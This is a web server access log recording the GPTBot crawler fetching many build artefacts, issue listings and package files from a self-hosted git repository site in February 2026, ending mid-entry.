"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" +[17/Feb/2026:19:51:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json?display=source" [Client 74.7.227.38] [Length 33313] [Gzip 10.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" +[17/Feb/2026:19:51:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11630] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:51:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11154] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:51:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11154] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:51:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" +[17/Feb/2026:19:51:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" +[17/Feb/2026:19:51:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11626] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:51:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json?display=source" [Client 74.7.227.38] [Length 14835] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" +[17/Feb/2026:19:51:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11627] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:51:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:51:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json?display=source" [Client 74.7.227.38] [Length 14833] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" +[17/Feb/2026:19:51:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11128] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:51:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11150] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" +[17/Feb/2026:19:51:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:51:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json?display=source" [Client 74.7.227.38] [Length 14831] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" +[17/Feb/2026:19:51:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:51:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11626] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:51:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11155] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:51:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11624] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" +[17/Feb/2026:19:51:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11628] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:51:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11155] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:51:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11151] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" +[17/Feb/2026:19:51:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11625] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" +[17/Feb/2026:19:51:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11156] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:51:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11155] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:51:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" [Client 74.7.227.38] [Length 9853] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" +[17/Feb/2026:19:51:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" [Client 74.7.227.38] [Length 15589] [Gzip 9.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" +[17/Feb/2026:19:51:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=open&type=all" +[17/Feb/2026:19:51:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=open&type=all" +[17/Feb/2026:19:51:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 11147] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" +[17/Feb/2026:19:51:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json?display=source" [Client 74.7.227.38] [Length 33315] [Gzip 10.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" +[17/Feb/2026:19:51:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=closed&type=all" +[17/Feb/2026:19:51:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache?display=rendered" [Client 74.7.227.38] [Length 11232] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" +[17/Feb/2026:19:51:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json?display=source" [Client 74.7.227.38] [Length 13155] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" +[17/Feb/2026:19:51:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 74.7.227.38] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html" +[17/Feb/2026:19:51:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10265] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build" +[17/Feb/2026:19:51:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache?display=source" [Client 74.7.227.38] [Length 11371] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" +[17/Feb/2026:19:51:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" +[17/Feb/2026:19:51:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" +[17/Feb/2026:19:51:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" +[17/Feb/2026:19:51:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" +[17/Feb/2026:19:51:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2fxref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 17159] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:19:51:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" [Client 74.7.227.38] [Length 13818742] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" +[17/Feb/2026:19:51:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" [Client 74.7.227.38] [Length 13924744] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" +[17/Feb/2026:19:51:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" [Client 74.7.227.38] [Length 13924903] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" +[17/Feb/2026:19:51:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html?display=rendered" [Client 74.7.227.38] [Length 11013] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:19:51:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html?display=source" [Client 